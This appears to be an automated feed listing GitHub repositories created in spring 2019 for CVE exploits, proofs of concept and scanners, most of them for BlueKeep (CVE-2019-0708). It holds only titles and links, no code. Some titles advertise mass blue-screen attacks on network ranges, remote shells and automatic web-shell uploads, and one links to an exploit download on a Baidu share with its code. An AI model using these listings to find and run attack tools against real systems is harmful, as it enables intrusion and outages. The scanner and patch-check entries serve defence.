**Vim/Neovim Arbitrary Code Execution via Modelines (CVE-2019-12735)** : [pcy190/ace-vim-neovim](https://github.com/pcy190/ace-vim-neovim) create time: 2019-06-06T06:00:06Z

**改写某大佬写的0708蓝屏脚本 改为网段批量蓝屏** : [Wileysec/CVE-2019-0708-Batch-Blue-Screen](https://github.com/Wileysec/CVE-2019-0708-Batch-Blue-Screen) create time: 2019-06-06T03:49:26Z

**CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection** : [mpgn/CVE-2018-16341](https://github.com/mpgn/CVE-2018-16341) create time: 2019-06-05T18:24:45Z

**no description** : [799600966/CVE-2018-17456](https://github.com/799600966/CVE-2018-17456) create time: 2019-06-05T15:10:09Z

**no description** : [tarantula-team/CVE-2019-12543](https://github.com/tarantula-team/CVE-2019-12543) create time: 2019-06-04T09:51:42Z

**no description** : [tarantula-team/CVE-2019-12542](https://github.com/tarantula-team/CVE-2019-12542) create time: 2019-06-04T09:46:51Z

**no description** : [tarantula-team/CVE-2019-12541](https://github.com/tarantula-team/CVE-2019-12541) create time: 2019-06-04T09:40:20Z

**no description** : [tarantula-team/CVE-2019-12538](https://github.com/tarantula-team/CVE-2019-12538) create time: 2019-06-04T09:32:10Z

**loudong** : [miracle03/CVE-2015-7547-master](https://github.com/miracle03/CVE-2015-7547-master) create time: 2019-06-04T03:24:21Z

**git {<2.13.7, <2.14.4, <2.15.2, <2.16.4, <2.17.1} remote code execution** : [jhswartz/CVE-2018-11235](https://github.com/jhswartz/CVE-2018-11235) create time: 2019-06-03T08:24:16Z

**Privesc through import of Sheduled tasks + Hardlinks - CVE-2019-1069** : [S3cur3Th1sSh1t/SharpPolarBear](https://github.com/S3cur3Th1sSh1t/SharpPolarBear) create time: 2019-06-03T08:07:32Z

**Python script to detect bluekeep vulnerability (CVE-2019-0708) with TLS/SSL and x509 support** : [HynekPetrak/detect_bluekeep.py](https://github.com/HynekPetrak/detect_bluekeep.py) create time: 2019-06-03T07:49:26Z

**CVE-2017-0144** : [kimocoder/eternalblue](https://github.com/kimocoder/eternalblue) create time: 2019-06-02T03:41:47Z

**CVE-2019-0708 - BlueKeep (RDP)** : [umarfarook882/CVE-2019-0708](https://github.com/umarfarook882/CVE-2019-0708) create time: 2019-05-31T17:37:26Z

**CVE-2019-0708批量蓝屏恶搞** : [AdministratorGithub/CVE-2019-0708](https://github.com/AdministratorGithub/CVE-2019-0708) create time: 2019-05-31T09:59:30Z

**蓝屏poc** : [shun-gg/CVE-2019-0708](https://github.com/shun-gg/CVE-2019-0708) create time: 2019-05-31T07:35:26Z

**no description** : [lp008/CVE_2019_0708_Blue_screen_poc](https://github.com/lp008/CVE_2019_0708_Blue_screen_poc) create time: 2019-05-31T06:37:19Z

**Exploit In Progress** : [qq431169079/CVE-2019-0709](https://github.com/qq431169079/CVE-2019-0709) create time: 2019-05-31T04:23:39Z

**no description** : [JasonLOU/CVE-2019-0708](https://github.com/JasonLOU/CVE-2019-0708) create time: 2019-05-31T02:28:23Z

**CVE-2019-0708 Exploit using Python** : [YHZX2013/CVE-2019-0709](https://github.com/YHZX2013/CVE-2019-0709) create time: 2019-05-31T00:48:49Z

**An Attempt to Port BlueKeep PoC from @Ekultek to actual exploits** : [algo7/bluekeep_CVE-2019-0708_poc_to_exploit](https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit) create time: 2019-05-31T00:04:12Z

**A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability.** : [Gh0st0ne/rdpscan-BlueKeep](https://github.com/Gh0st0ne/rdpscan-BlueKeep) create time: 2019-05-30T13:50:32Z

**CVE-2019-0708** : [UraSecTeam/CVE-2019-0708](https://github.com/UraSecTeam/CVE-2019-0708) create time: 2019-05-30T08:59:49Z

**Proof of concept for CVE-2019-0708** : [Ekultek/BlueKeep](https://github.com/Ekultek/BlueKeep) create time: 2019-05-29T16:53:54Z

**no description** : [haishanzheng/CVE-2019-0708-generate-hosts](https://github.com/haishanzheng/CVE-2019-0708-generate-hosts) create time: 2019-05-29T14:29:32Z

**no description** : [infiniti-team/CVE-2019-0708](https://github.com/infiniti-team/CVE-2019-0708) create time: 2019-05-29T05:51:07Z

**CVE-2019-2725 命令回显** : [lufeirider/CVE-2019-2725](https://github.com/lufeirider/CVE-2019-2725) create time: 2019-05-29T01:57:05Z

**CVE-2019-0708 bluekeep 漏洞检测** : [oneoy/BlueKeep](https://github.com/oneoy/BlueKeep) create time: 2019-05-29T01:08:55Z

**基于360公开的无损检测工具的可直接在windows上运行的批量检测程序** : [ht0Ruial/CVE-2019-0708Poc-BatchScanning](https://github.com/ht0Ruial/CVE-2019-0708Poc-BatchScanning) create time: 2019-05-28T16:09:10Z

**sctp-PoC** : [butterflyhack/CVE-2019-8956](https://github.com/butterflyhack/CVE-2019-8956) create time: 2019-05-28T07:09:17Z

**Only Hitting PoC [Tested on Windows Server 2008 r2]** : [Leoid/CVE-2019-0708](https://github.com/Leoid/CVE-2019-0708) create time: 2019-05-28T02:25:21Z

**no description** : [ABIZCHI/CVE-2018-9995_dvr_credentials](https://github.com/ABIZCHI/CVE-2018-9995_dvr_credentials) create time: 2019-05-28T01:05:16Z

**no description** : [caxmd/CVE-2017-13156](https://github.com/caxmd/CVE-2017-13156) create time: 2019-05-27T20:32:05Z

**Arbitrary deserialization that can be used to trigger SQL injection and even Code execution** : [R3dKn33-zz/CVE-2013-0156](https://github.com/R3dKn33-zz/CVE-2013-0156) create time: 2019-05-27T19:17:55Z

**Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340** : [jas502n/CVE-2019-6340](https://github.com/jas502n/CVE-2019-6340) create time: 2019-05-27T19:06:14Z

**CVE-2019-0708** : [Rostelecom-CERT/bluekeepscan](https://github.com/Rostelecom-CERT/bluekeepscan) create time: 2019-05-27T12:52:11Z

**no description** : [aenlr/strutt-cve-2014-0114](https://github.com/aenlr/strutt-cve-2014-0114) create time: 2019-05-27T07:04:54Z

**Mass MikroTik WinBox Exploitation tool, CVE-2018-14847** : [mahmoodsabir/mikrotik-beast](https://github.com/mahmoodsabir/mikrotik-beast) create time: 2019-05-26T12:26:55Z

**no description** : [pooooobi/CVE-2019-](https://github.com/pooooobi/CVE-2019-) create time: 2019-05-26T11:30:10Z

**no description** : [codeplutos/CVE-2019-12086-jackson-databind-file-read](https://github.com/codeplutos/CVE-2019-12086-jackson-databind-file-read) create time: 2019-05-26T03:19:49Z

**cve-2019-0708 poc .** : [closethe/CVE-2019-0708-POC](https://github.com/closethe/CVE-2019-0708-POC) create time: 2019-05-24T07:40:05Z

**yehnah** : [smashinu/CVE-2017-8759Expoit](https://github.com/smashinu/CVE-2017-8759Expoit) create time: 2019-05-24T06:29:45Z

**ATutor 2.2.4 Arbitrary File Upload / RCE (CVE-2019-12169)** : [fuzzlove/ATutor-2.2.4-Language-Exploit](https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit) create time: 2019-05-24T05:15:17Z

**Exploit for CVE-2019-11881 (Rancher 2.1.4 Web Parameter Tampering)** : [MauroEldritch/VanCleef](https://github.com/MauroEldritch/VanCleef) create time: 2019-05-24T00:09:21Z

**A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability.** : [robertdavidgraham/rdpscan](https://github.com/robertdavidgraham/rdpscan) create time: 2019-05-23T22:50:12Z

**CVE-2019-0708 PoC Exploit** : [freeide/CVE-2019-0708-PoC-Exploit](https://github.com/freeide/CVE-2019-0708-PoC-Exploit) create time: 2019-05-23T18:37:27Z

**Working proof of concept for CVE-2019-0708, spawns remote shell.** : [smallFunction/CVE-2019-0708-POC](https://github.com/smallFunction/CVE-2019-0708-POC) create time: 2019-05-23T17:02:00Z

**A social experiment** : [adalenv/CVE-2019-0708-Tool](https://github.com/adalenv/CVE-2019-0708-Tool) create time: 2019-05-23T15:08:30Z

**Goby support CVE-2019-0708 "BlueKeep" vulnerability check** : [gobysec/CVE-2019-0708](https://github.com/gobysec/CVE-2019-0708) create time: 2019-05-23T13:54:24Z

**Exploit Generator for CVE-2018-8174 & CVE-2019-0768 (RCE via VBScript Execution in IE11)** : [ruthlezs/ie11_vbscript_exploit](https://github.com/ruthlezs/ie11_vbscript_exploit) create time: 2019-05-23T10:28:40Z

**CVE-2019-12460|Reflected XSS in WebPort-v1.19.1 impacts users who open a maliciously crafted link or third-party web page.** : [EmreOvunc/WebPort-v1.19.1-Reflected-XSS](https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS) create time: 2019-05-23T10:27:49Z

**Check vuln CVE 2019-0708** : [SugiB3o/Check-vuln-CVE-2019-0708](https://github.com/SugiB3o/Check-vuln-CVE-2019-0708) create time: 2019-05-23T07:47:29Z

**no description** : [CherishHair/CVE-2019-0232-EXP](https://github.com/CherishHair/CVE-2019-0232-EXP) create time: 2019-05-23T05:44:29Z

**no description** : [major203/cve-2019-0708-scan](https://github.com/major203/cve-2019-0708-scan) create time: 2019-05-22T07:53:50Z

**cve-2019-0708 vulnerablility scanner** : [l9c/rdp0708scanner](https://github.com/l9c/rdp0708scanner) create time: 2019-05-22T05:18:18Z

**根据360Vulcan Team开发的CVE-2019-0708单个IP检测工具构造了个批量检测脚本而已** : [herhe/CVE-2019-0708poc](https://github.com/herhe/CVE-2019-0708poc) create time: 2019-05-22T03:10:14Z

**Scanner PoC for CVE-2019-0708 RDP RCE vuln** : [zerosum0x0/CVE-2019-0708](https://github.com/zerosum0x0/CVE-2019-0708) create time: 2019-05-22T00:08:44Z

**CVE-2019-12252 Zoho ManageEngine ServiceDesk Plus < 10.5 Incorrect Access Control** : [tuyenhva/CVE-2019-12252](https://github.com/tuyenhva/CVE-2019-12252) create time: 2019-05-21T16:59:23Z

**no description** : [zjw88282740/CVE-2019-0708-win7](https://github.com/zjw88282740/CVE-2019-0708-win7) create time: 2019-05-21T13:16:49Z

**Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0** : [jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238) create time: 2019-05-21T13:16:02Z

**Darktrace CSRF exploit** : [gerwout/CVE-2019-9596-and-CVE-2019-9597](https://github.com/gerwout/CVE-2019-9596-and-CVE-2019-9597) create time: 2019-05-21T13:14:43Z

**Cisco Exploit (CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution/CVE-2019-1653/Cisco SNMP RCE/Dump Cisco RV320 Password)** : [k8gege/CiscoExploit](https://github.com/k8gege/CiscoExploit) create time: 2019-05-21T12:42:54Z

**My bot (badly written) to search and monitor cve-2019-0708 repositories** : [pry0cc/BlueKeepTracker](https://github.com/pry0cc/BlueKeepTracker) create time: 2019-05-21T11:37:00Z

**根据360的程序,整的CVE-2019-0708批量检测** : [edvacco/CVE-2019-0708-POC](https://github.com/edvacco/CVE-2019-0708-POC) create time: 2019-05-21T10:34:21Z

**High level exploit** : [freeide/CVE-2019-0708](https://github.com/freeide/CVE-2019-0708) create time: 2019-05-21T07:51:41Z

**dump** : [n1xbyte/CVE-2019-0708](https://github.com/n1xbyte/CVE-2019-0708) create time: 2019-05-21T06:57:19Z

**CVE-2019-0708 远程代码执行漏洞批量检测** : [biggerwing/CVE-2019-0708-poc](https://github.com/biggerwing/CVE-2019-0708-poc) create time: 2019-05-21T05:38:54Z

**Report fraud** : [ttsite/CVE-2019-0708](https://github.com/ttsite/CVE-2019-0708) create time: 2019-05-21T04:00:49Z

**CVE-2019-12190 - CentOS-WebPanel XSS vulnerability** : [tuyenhva/CVE-2019-12190](https://github.com/tuyenhva/CVE-2019-12190) create time: 2019-05-20T08:09:49Z

**no description** : [leezp/CVE-2017-1000117](https://github.com/leezp/CVE-2017-1000117) create time: 2019-05-20T07:25:58Z

**CVE-2019-12189 - Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability** : [tuyenhva/CVE-2019-12189](https://github.com/tuyenhva/CVE-2019-12189) create time: 2019-05-20T07:23:51Z

**no description** : [falconz/CVE-2019-12189](https://github.com/falconz/CVE-2019-12189) create time: 2019-05-20T04:52:38Z

**Announces fraud** : [ttsite/CVE-2019-0708-](https://github.com/ttsite/CVE-2019-0708-) create time: 2019-05-20T04:23:58Z

**It's only hitting vulnerable path in termdd.sys!!! NOT DOS** : [skyshell20082008/CVE-2019-0708-PoC-Hitting-Path](https://github.com/skyshell20082008/CVE-2019-0708-PoC-Hitting-Path) create time: 2019-05-19T23:32:34Z

**eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE (CVE-2019-12185)** : [fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE](https://github.com/fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE) create time: 2019-05-18T23:56:52Z

**LOL** : [yushiro/CVE-2019-0708](https://github.com/yushiro/CVE-2019-0708) create time: 2019-05-18T00:45:15Z

**Win32k Exploit by Grant Willcox** : [exodusintel/CVE-2019-0808](https://github.com/exodusintel/CVE-2019-0808) create time: 2019-05-17T14:08:01Z

**Win32k Elevation of Privilege Poc** : [ExpLife0011/CVE-2019-0803](https://github.com/ExpLife0011/CVE-2019-0803) create time: 2019-05-17T11:05:22Z

**xnu kernel heap info leak** : [maldiohead/CVE-2019-6207](https://github.com/maldiohead/CVE-2019-6207) create time: 2019-05-17T06:37:07Z

**getdirentriesattr kernel heap inofo leak** : [dothanthitiendiettiende/CVE-2019-6207](https://github.com/dothanthitiendiettiende/CVE-2019-6207) create time: 2019-05-17T06:17:51Z

**CVE-2019-0708 Exploit** : [haoge8090/CVE-2019-0708](https://github.com/haoge8090/CVE-2019-0708) create time: 2019-05-17T05:19:32Z

**Kernel Stack info leak at exportObjectToClient function** : [maldiohead/CVE-2019-8540](https://github.com/maldiohead/CVE-2019-8540) create time: 2019-05-17T04:07:14Z

**CVE-2019-0708漏洞MSF批量巡检插件** : [blockchainguard/CVE-2019-0708](https://github.com/blockchainguard/CVE-2019-0708) create time: 2019-05-17T03:25:42Z

**a kernel information leak on macOS<= 10.14.4** : [maldiohead/CVE-2019-8627](https://github.com/maldiohead/CVE-2019-8627) create time: 2019-05-17T02:40:39Z

**PoC for CVE-2019-0708** : [f8al/CVE-2019-0708-POC](https://github.com/f8al/CVE-2019-0708-POC) create time: 2019-05-16T20:30:36Z

**POC for CVE-2019-0708** : [303sec/CVE-2019-0708](https://github.com/303sec/CVE-2019-0708) create time: 2019-05-16T16:26:30Z

**Powershell script to run and determine if a specific device has been patched for CVE-2019-0708. This checks to see if the termdd.sys file has been updated appropriate and is at a version level at or greater than the versions released in the 5/14/19 patches.** : [fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status](https://github.com/fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status) create time: 2019-05-16T15:47:29Z

**no description** : [chaosura/CVE-2018-6574](https://github.com/chaosura/CVE-2018-6574) create time: 2019-05-16T15:02:22Z

**no description** : [Jaky5155/cve-2019-0708-exp](https://github.com/Jaky5155/cve-2019-0708-exp) create time: 2019-05-16T13:21:02Z

**CVE-2019-0708 demo** : [safly/CVE-2019-0708](https://github.com/safly/CVE-2019-0708) create time: 2019-05-16T09:55:25Z

**A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.** : [ShadowBrokers-ExploitLeak/CVE-2019-0708](https://github.com/ShadowBrokers-ExploitLeak/CVE-2019-0708) create time: 2019-05-16T00:56:58Z

**A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.** : [Barry-McCockiner/CVE-2019-0708](https://github.com/Barry-McCockiner/CVE-2019-0708) create time: 2019-05-16T00:45:55Z

**PoC about CVE-2019-0708 (RDP; Windows 7, Windows Server 2003, Windows Server 2008)** : [syriusbughunt/CVE-2019-0708](https://github.com/syriusbughunt/CVE-2019-0708) create time: 2019-05-16T00:34:23Z

**no description** : [HackerJ0e/CVE-2019-0708](https://github.com/HackerJ0e/CVE-2019-0708) create time: 2019-05-15T22:03:28Z

**CVE-2019-0708 EXPloit-poc 漏洞描述 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器。类似于2017年爆发的WannaCry等恶意勒索软件病毒。 漏洞评级 CVE-2019-0708 严重 安全建议 1、针对Windows 7及Windows Server 2008的用户,及时安装官方安全补丁:https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175 2、针对Windows 2003及Windows XP的用户,及时更新系统版本或安装官方补丁:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 CVE-2019-0708 EXPloit-poc 影响版本 Windows7 XP Windows 2003 Windows Server 2008 Windows Server 2008 R2 EXPloit-poc: https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8** : [sbkcbig/CVE-2019-0708-Poc-exploit](https://github.com/sbkcbig/CVE-2019-0708-Poc-exploit) create time: 2019-05-15T20:26:34Z

**no description** : [gildaaa/CVE-2019-0708](https://github.com/gildaaa/CVE-2019-0708) create time: 2019-05-15T20:04:23Z

**Totally legitimate** : [n0auth/CVE-2019-0708](https://github.com/n0auth/CVE-2019-0708) create time: 2019-05-15T19:53:34Z

**no description** : [infenet/CVE-2019-0708](https://github.com/infenet/CVE-2019-0708) create time: 2019-05-15T19:11:03Z

**CVE-2019-0708** : [blacksunwen/CVE-2019-0708](https://github.com/blacksunwen/CVE-2019-0708) create time: 2019-05-15T17:56:22Z

**sup pry0cc :3** : [thugcrowd/CVE-2019-0708](https://github.com/thugcrowd/CVE-2019-0708) create time: 2019-05-15T16:33:31Z

**PoC exploit for BlueKeep (CVE-2019-0708)** : [NullByteSuiteDevs/CVE-2019-0708](https://github.com/NullByteSuiteDevs/CVE-2019-0708) create time: 2019-05-15T16:22:02Z

**RDP POC** : [jiansiting/CVE-2019-0708](https://github.com/jiansiting/CVE-2019-0708) create time: 2019-05-15T15:29:05Z

**exploit CVE-2019-0708 RDS** : [hotdog777714/RDS_CVE-2019-0708](https://github.com/hotdog777714/RDS_CVE-2019-0708) create time: 2019-05-15T15:09:37Z

**3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)** : [k8gege/CVE-2019-0708](https://github.com/k8gege/CVE-2019-0708) create time: 2019-05-15T15:01:38Z

**CVE-2019-0708** : [YSheldon/MS_T120](https://github.com/YSheldon/MS_T120) create time: 2019-05-15T14:14:04Z

**EXPloit-poc: https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8** : [sbkcbig/CVE-2019-0708-EXPloit-3389](https://github.com/sbkcbig/CVE-2019-0708-EXPloit-3389) create time: 2019-05-15T14:00:38Z

**POCexp:https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8** : [sbkcbig/CVE-2019-0708-EXPloit](https://github.com/sbkcbig/CVE-2019-0708-EXPloit) create time: 2019-05-15T13:49:09Z

**Testing my new bot out** : [pry0cc/cve-2019-0708-2](https://github.com/pry0cc/cve-2019-0708-2) create time: 2019-05-15T09:32:28Z

**Proof of concept exploit for CVE-2019-0708** : [areusecure/CVE-2019-0708](https://github.com/areusecure/CVE-2019-0708) create time: 2019-05-15T09:25:04Z

**CVE-2019-0708** : [temp-user-2014/CVE-2019-0708](https://github.com/temp-user-2014/CVE-2019-0708) create time: 2019-05-15T07:24:34Z

**Dark Net Sunset New Release CVE-2019-0708** : [xiyangzuishuai/Dark-Network-CVE-2019-0708](https://github.com/xiyangzuishuai/Dark-Network-CVE-2019-0708) create time: 2019-05-15T07:09:24Z

**CVE-2019-0708 exp** : [matengfei000/CVE-2019-0708](https://github.com/matengfei000/CVE-2019-0708) create time: 2019-05-15T04:05:07Z

**Using CVE-2019-0708 to Locally Promote Privileges in Windows 10 System** : [rockmelodies/CVE-2019-0708-Exploit](https://github.com/rockmelodies/CVE-2019-0708-Exploit) create time: 2019-05-15T02:58:04Z

**CVE-2019-0708-exploit** : [p0p0p0/CVE-2019-0708-exploit](https://github.com/p0p0p0/CVE-2019-0708-exploit) create time: 2019-05-15T02:24:21Z

**CVE-2019-0708** : [yetiddbb/CVE-2019-0708-PoC](https://github.com/yetiddbb/CVE-2019-0708-PoC) create time: 2019-05-15T02:03:50Z

**Numpy deserialization command execution** : [RayScri/CVE-2019-6446](https://github.com/RayScri/CVE-2019-6446) create time: 2019-05-15T01:39:53Z

**no description** : [s0/rsyslog-librelp-CVE-2018-1000140-fixed](https://github.com/s0/rsyslog-librelp-CVE-2018-1000140-fixed) create time: 2019-05-14T21:58:54Z

**A Win7 RDP exploit** : [SherlockSec/CVE-2019-0708](https://github.com/SherlockSec/CVE-2019-0708) create time: 2019-05-14T21:47:33Z

**Pinned version of rsyslov vulnerable to CVE-2018-1000140** : [s0/rsyslog-librelp-CVE-2018-1000140](https://github.com/s0/rsyslog-librelp-CVE-2018-1000140) create time: 2019-05-14T21:02:07Z

**proof of concept exploit for Microsoft Windows 7 and Server 2008 RDP vulnerability** : [hook-s3c/CVE-2019-0708-poc](https://github.com/hook-s3c/CVE-2019-0708-poc) create time: 2019-05-14T21:00:50Z

**Potential malicious code execution via CHM hijacking (CVE-2019-9896)** : [yasinyilmaz/vuln-chm-hijack](https://github.com/yasinyilmaz/vuln-chm-hijack) create time: 2019-05-13T16:17:06Z

**ATutor 2.2.4 'Backup' Remote Command Execution (CVE-2019-12170)** : [fuzzlove/ATutor-Instructor-Backup-Arbitrary-File](https://github.com/fuzzlove/ATutor-Instructor-Backup-Arbitrary-File) create time: 2019-05-13T06:01:47Z

**no description** : [chiaifan/CVE-2019-2615](https://github.com/chiaifan/CVE-2019-2615) create time: 2019-05-12T16:25:28Z

**CVE-2019-0211-apache & CVE-2019-6977-imagecolormatch** : [ozkanbilge/Apache-Exploit-2019](https://github.com/ozkanbilge/Apache-Exploit-2019) create time: 2019-05-12T10:08:57Z

**(Wordpress) Ninja Forms File Uploads Extension <= 3.0.22 – Unauthenticated Arbitrary File Upload** : [KTN1990/CVE-2019-10869](https://github.com/KTN1990/CVE-2019-10869) create time: 2019-05-12T08:20:16Z

**Exploit for Easy File Sharing FTP Server 3.5 on Win7 32** : [adenkiewicz/CVE-2006-3592](https://github.com/adenkiewicz/CVE-2006-3592) create time: 2019-05-11T18:11:34Z

**Speculative Store Bypass (CVE-2018-3639) proof of concept for Linux** : [mmxsrup/CVE-2018-3639](https://github.com/mmxsrup/CVE-2018-3639) create time: 2019-05-11T12:11:05Z

**Banner Web Tailor and Banner Enterprise Identity Services Vulnerability Disclosure** : [JoshuaMulliken/CVE-2019-8978](https://github.com/JoshuaMulliken/CVE-2019-8978) create time: 2019-05-10T19:46:58Z

**PoC for CVE-2019-6203, works on < iOS 12.2, macOS < 10.14.4** : [qingxp9/CVE-2019-6203-PoC](https://github.com/qingxp9/CVE-2019-6203-PoC) create time: 2019-05-10T10:36:54Z

**no description** : [zhusx110/cve-2019-2725](https://github.com/zhusx110/cve-2019-2725) create time: 2019-05-10T09:07:58Z

**no description** : [zjt674449039/cve-2011-1473](https://github.com/zjt674449039/cve-2011-1473) create time: 2019-05-10T02:42:13Z

**Docker runc CVE-2019-5736 exploit Dockerfile. Credits : https://github.com/Frichetten/CVE-2019-5736-PoC.git** : [panzouh/Docker-Runc-Exploit](https://github.com/panzouh/Docker-Runc-Exploit) create time: 2019-05-09T05:45:21Z

**no description** : [sasqwatch/CVE-2017-8570](https://github.com/sasqwatch/CVE-2017-8570) create time: 2019-05-08T20:53:27Z

**cve-2019-10678** : [cved-sources/cve-2019-10678](https://github.com/cved-sources/cve-2019-10678) create time: 2019-05-06T20:15:47Z

**cve-2019-9978** : [cved-sources/cve-2019-9978](https://github.com/cved-sources/cve-2019-9978) create time: 2019-05-06T20:11:20Z

**Zimbra邮件系统漏洞 XXE/RCE/SSRF/Upload GetShell Exploit 1. (CVE-2019-9621 Zimbra<8.8.11 XXE GetShell Exploit)** : [k8gege/ZimbraExploit](https://github.com/k8gege/ZimbraExploit) create time: 2019-05-06T15:47:20Z

**CVE-2019-2618-自己编写** : [wsfengfan/CVE-2019-2618-](https://github.com/wsfengfan/CVE-2019-2618-) create time: 2019-05-06T10:33:26Z

**Wordpress Social Warfare Remote Code Execution (AUTO UPLOAD SHELL)** : [KTN1990/CVE-2019-9978](https://github.com/KTN1990/CVE-2019-9978) create time: 2019-05-06T04:48:43Z

**Exploit for CVE-2019-9810 Firefox on Windows 64-bit.** : [0vercl0k/CVE-2019-9810](https://github.com/0vercl0k/CVE-2019-9810) create time: 2019-05-05T17:19:02Z

**no description** : [leerina/CVE-2019-2725](https://github.com/leerina/CVE-2019-2725) create time: 2019-05-05T08:34:20Z

**no description** : [genknife/cve-2019-8565](https://github.com/genknife/cve-2019-8565) create time: 2019-05-05T07:34:05Z

**A proof of concept for ReadyAPI 2.5.0/2.6.0 Remote Code Execution Vulnerability.** : [gscamelo/CVE-2018-20580](https://github.com/gscamelo/CVE-2018-20580) create time: 2019-05-03T17:53:17Z

**CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)** : [hash3liZer/CVE-2019-9978](https://github.com/hash3liZer/CVE-2019-9978) create time: 2019-05-03T05:57:44Z

**For Metasploit pull request** : [7043mcgeep/cve-2017-8890-msf](https://github.com/7043mcgeep/cve-2017-8890-msf) create time: 2019-05-03T04:14:17Z

**no description** : [davidmthomsen/CVE-2019-2725](https://github.com/davidmthomsen/CVE-2019-2725) create time: 2019-05-02T21:09:36Z

**A proof of concept for Metasploit's CVE-2019-5624 vulnerability (Rubyzip insecure ZIP handling RCE)** : [VoidSec/CVE-2019-5624](https://github.com/VoidSec/CVE-2019-5624) create time: 2019-05-02T14:54:08Z

**WordPress crop-image exploitation** : [synacktiv/CVE-2019-8942](https://github.com/synacktiv/CVE-2019-8942) create time: 2019-05-02T08:41:11Z

**no description** : [lasensio/cve-2019-2725](https://github.com/lasensio/cve-2019-2725) create time: 2019-05-01T22:25:14Z

**no description** : [jiansiting/CVE-2019-3719](https://github.com/jiansiting/CVE-2019-3719) create time: 2019-05-01T04:43:55Z

**PoC command injection example for cve-2018-1002105 based off https://github.com/gravitational/cve-2018-1002105** : [bgeesaman/cve-2018-1002105](https://github.com/bgeesaman/cve-2018-1002105) create time: 2019-04-30T15:01:23Z

**no description** : [genknife/cve-2019-8513](https://github.com/genknife/cve-2019-8513) create time: 2019-04-30T07:06:23Z

**Spring Data Commons RCE 远程命令执行漏洞** : [jas502n/cve-2018-1273](https://github.com/jas502n/cve-2018-1273) create time: 2019-04-29T03:43:15Z

**Repo for a uni project to give a detailed explanation of CVE-2018-1000224** : [zann1x/ITS](https://github.com/zann1x/ITS) create time: 2019-04-28T18:31:03Z

**ios 缓冲区溢出exp** : [5431/CVE-2018-4407](https://github.com/5431/CVE-2018-4407) create time: 2019-04-28T08:19:48Z

**Confluence Widget Connector path traversal (CVE-2019-3396)** : [vntest11/confluence_CVE-2019-3396](https://github.com/vntest11/confluence_CVE-2019-3396) create time: 2019-04-28T05:59:21Z

**漏洞利用工具** : [wucj001/cve-2019-48814](https://github.com/wucj001/cve-2019-48814) create time: 2019-04-28T03:24:47Z

**no description** : [iceMatcha/CNTA-2019-0014xCVE-2019-2725](https://github.com/iceMatcha/CNTA-2019-0014xCVE-2019-2725) create time: 2019-04-28T02:18:42Z

**no description** : [shawntns/exploit-CVE-2014-6271](https://github.com/shawntns/exploit-CVE-2014-6271) create time: 2019-04-27T18:55:39Z

**Checks a list of SSH servers for password-based auth availability and for the existence of SSH user enumeration vulnerability (CVE-2018-15473) in those identified.** : [secmode/enumpossible](https://github.com/secmode/enumpossible) create time: 2019-04-27T16:52:23Z

**An intentionally vulnerable (CVE-2017-8046) SrpingData REST appl with Swagger Support for pentesting purposes** : [jsotiro/VulnerableSpringDataRest](https://github.com/jsotiro/VulnerableSpringDataRest) create time: 2019-04-27T07:23:53Z

**WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm** : [7kbstorm/WebLogic_CNVD_C2019_48814](https://github.com/7kbstorm/WebLogic_CNVD_C2019_48814) create time: 2019-04-25T12:33:31Z

**WebLogic CNVD-C-2019_48814 CVE-2017-10271** : [Yuusuke4/WebLogic_CNVD_C_2019_48814](https://github.com/Yuusuke4/WebLogic_CNVD_C_2019_48814) create time: 2019-04-25T12:18:16Z

**The official exploit code for LibreNMS v1.46 Remote Code Execution CVE-2018-20434** : [mhaskar/CVE-2018-20434](https://github.com/mhaskar/CVE-2018-20434) create time: 2019-04-25T11:06:48Z

**DVR-HACKING-HACK4LX** : [attakercyebr/hack4lx_CVE-2018-2019](https://github.com/attakercyebr/hack4lx_CVE-2018-2019) create time: 2019-04-25T09:19:42Z

**no description** : [zhangyongbo100/-Ruby-dl-handle.c-CVE-2009-5147-](https://github.com/zhangyongbo100/-Ruby-dl-handle.c-CVE-2009-5147-) create time: 2019-04-25T06:46:50Z

**CVE-2019-6467 (BIND nxdomain-redirect)** : [knqyf263/CVE-2019-6467](https://github.com/knqyf263/CVE-2019-6467) create time: 2019-04-25T03:26:42Z

